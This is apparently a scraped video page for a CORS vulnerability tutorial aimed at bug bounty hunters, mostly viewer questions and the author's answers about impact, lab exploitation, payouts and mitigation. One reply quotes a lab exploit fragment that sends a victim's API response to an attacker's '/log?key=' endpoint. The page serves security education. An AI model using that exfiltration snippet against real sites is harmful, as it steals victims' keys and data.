Cross Origin Resource Sharing (CORS) Vulnerability | BugBountyTraining | Bug Bounty Service

  Рет қаралды 13,033

Martin Voelk

Martin Voelk

Күн бұрын

Пікірлер: 36
@BhushanJadhav-nm3gi
@BhushanJadhav-nm3gi 5 ай бұрын
simple and crisp clear. THANKS!
@martinvoelk
@martinvoelk 4 ай бұрын
Glad you liked it!
@ashish_gupta307
@ashish_gupta307 Ай бұрын
Hello, Does CORS policy helps in preventing CSRF attack.
@martinvoelk
@martinvoelk Ай бұрын
CORS policy does not directly prevent CSRF attacks because it controls access to responses rather than stopping requests from being made. Proper CSRF defenses, like CSRF tokens or SameSite cookies, are still required to protect against such attacks.
@patehkhan9119
@patehkhan9119 22 күн бұрын
Hello martin Your video quality and explanation is amazing. I found a vulnerability using burp cors but the link for me ends with js and I'm not able to exploit it Can you help me out with that? Thank you
@martinvoelk
@martinvoelk 21 күн бұрын
Calling a js is not showing impact.Remember you want to have the victim visit a page which is then executing a script which will call something interesting like an API and the response is logged to a server you control. Some BB programs say a pure CORS misconfig is informational. If cookies are passed you may get a low payout. But critical is only when you can exfiltrate some data from another user in a POC
@patehkhan9119
@patehkhan9119 21 күн бұрын
@@martinvoelk Thank you for the response Glad to be your subscriber. I'm so new into this and eager to learn. I downloaded the file from github called cors exploit Pasted link in it and it did exploit shows some ids in the browser and i reported it. Hopefully will get something out of it 😅
@patehkhan9119
@patehkhan9119 21 күн бұрын
@@martinvoelk and i scanned the website using burp professional crawl and audit. This is how i found that vulnerability burp shows high severity then i investigate it and found your channel.
@martinvoelk
@martinvoelk 21 күн бұрын
@@patehkhan9119 Best of luck. It takes a while, but once you get the hang of it you will find these all over. I still do it despite having a full time Pentester job, wife and family. Very addictive :)
@曹曹嘉旭
@曹曹嘉旭 Ай бұрын
Have you done CORS experiments on portswigger? The first level why did I write an html+JavaScript script according to the official poc, send the request to the victim but can not get the api key?
@martinvoelk
@martinvoelk Ай бұрын
You are making an AJAX request. If you follow that lab, you will see an API call made. Now you want to read the response. You put the AJAX request into a script. Then the victim visits that. The cookies are being sent along and the response is logged at the attacker server. You need to check the log files. Check the solution on Portswigger.. This is the key function reqListener() { location='/log?key='+this.responseText; Basically it will be logged at /log?key= Check the log once you delivered it to the victim
@mr-bahi3338
@mr-bahi3338 Ай бұрын
Hi What is the impact.... please 🥺
@martinvoelk
@martinvoelk Ай бұрын
Steal sensitive data: By exploiting a vulnerable CORS policy, attackers can bypass same-origin policies and retrieve sensitive information like user credentials, tokens, or personal data from another origin. Perform unauthorized actions: Attackers can send authenticated requests from a malicious website to a vulnerable API, performing actions on behalf of the victim, such as transferring funds or changing account settings, leading to account compromise or data manipulation.
@digital-g3h
@digital-g3h 8 ай бұрын
Great explaination
@martinvoelk
@martinvoelk 7 ай бұрын
Thanks
@martinvoelk
@martinvoelk 7 ай бұрын
Thank you
@SHINDE1RU
@SHINDE1RU 3 ай бұрын
what if, the response has: Access-Control-Allow-Origin: * but, no "allow-credentials" popped on headers response. Is like, vulnerable in a real case scenario?
@martinvoelk
@martinvoelk 3 ай бұрын
That totally depends. In a Penetration Test it's a finding with low CVSS score. In Bug Bounty it's usually closed as informative however I had 2 companies pay me as a low. Normally they say in the Ts and Cs. CORS with impact. To pass cookies and make it impactful you need the allow credentials. Hope that makes sense?
@nazeeralbekae5773
@nazeeralbekae5773 Жыл бұрын
if the response says status302 not 200 is a serious vulnerability, can the attacker still take advantage of this ????
@martinvoelk
@martinvoelk 10 ай бұрын
Not necessarily. A 302 is a temporary redirect. you should check how the redirect is initiated. If it's via "Location" usually you cant pull anything meaningful of. Sometimes however it will redirect via window.location and then you might be able to introduce XSS
@musicality621
@musicality621 7 ай бұрын
How about CORS on POST request? Is that a vulnerability as well?
@martinvoelk
@martinvoelk 6 ай бұрын
Yes absolutely. As a matter of fact you see CORS vulnerabilities often on POST requests
@KalkiKrivaDNA
@KalkiKrivaDNA 5 ай бұрын
I find api subdomiNS BUT most of api endpoints are not accessible .
@martinvoelk
@martinvoelk 4 ай бұрын
They probably need authentication. Most API endpoints will require some sort of authentication.
@ManavSahoo-od7dl
@ManavSahoo-od7dl 6 ай бұрын
If i find a cors bug but it's on POST request how do i exploit it???? please reply
@martinvoelk
@martinvoelk 6 ай бұрын
For Bug Bounty you often don't need to exploit it and just report the reflected headers. Some will accept it and some won't. For impact it depends. Take a look at the CORS labs from the Web Security Academy. Typically you make an Ajax call from your own host to a sensitive (behind login) function
@ChristianScott-wj6qm
@ChristianScott-wj6qm Ай бұрын
@@martinvoelkhey martin I hope you are well, I have been working on BBP as a hatchling and just discovered my first CORS misconfig. Reading through the comments I was looking for impact, and this has answered my questions. THANK YOU!!!!!
@martinvoelk
@martinvoelk Ай бұрын
@@ChristianScott-wj6qm cool
@adityaalfikri6001
@adityaalfikri6001 10 ай бұрын
Cross origin Resorce bug
@martinvoelk
@martinvoelk 10 ай бұрын
yes
@popovanatoliy4736
@popovanatoliy4736 2 ай бұрын
HOW TO PROTECT FROM THIS FFS?!
@popovanatoliy4736
@popovanatoliy4736 2 ай бұрын
sorry, i listened for few minutes but you just repeated how this vulnerability works.
@martinvoelk
@martinvoelk 2 ай бұрын
Ensure that the server only allows trusted origins to make cross-origin requests by properly configuring the Access-Control-Allow-Origin header. Additionally, use proper authentication and authorization mechanisms to prevent unauthorized access to sensitive resources.
Cross-Origin Resource Sharing (CORS) | Complete Guide
52:17
Rana Khalil
Рет қаралды 74 М.
Ice Cream or Surprise Trip Around the World?
00:31
Hungry FAM
Рет қаралды 21 МЛН
When Cucumbers Meet PVC Pipe The Results Are Wild! 🤭
00:44
Crafty Buddy
Рет қаралды 56 МЛН
Taking over a website with JWT Tokens!
14:27
Tech Raj
Рет қаралды 60 М.
What is CORS?
13:22
A shot of code
Рет қаралды 68 М.
Covering The Under Rated Vulnerabilities: CORS Misconfiguration #1
17:19
Learn CORS In 6 Minutes
6:06
Web Dev Simplified
Рет қаралды 735 М.
Cross-Site Request Forgery (CSRF) Explained
11:59
NahamSec
Рет қаралды 24 М.
My Favorite API Hacking Vulnerabilities & Tips
10:08
NahamSec
Рет қаралды 14 М.
Watch me hack a Wordpress website..
28:52
Tech Raj
Рет қаралды 286 М.
Hands-on guide to CORS
9:31
The Cyber Mentor
Рет қаралды 6 М.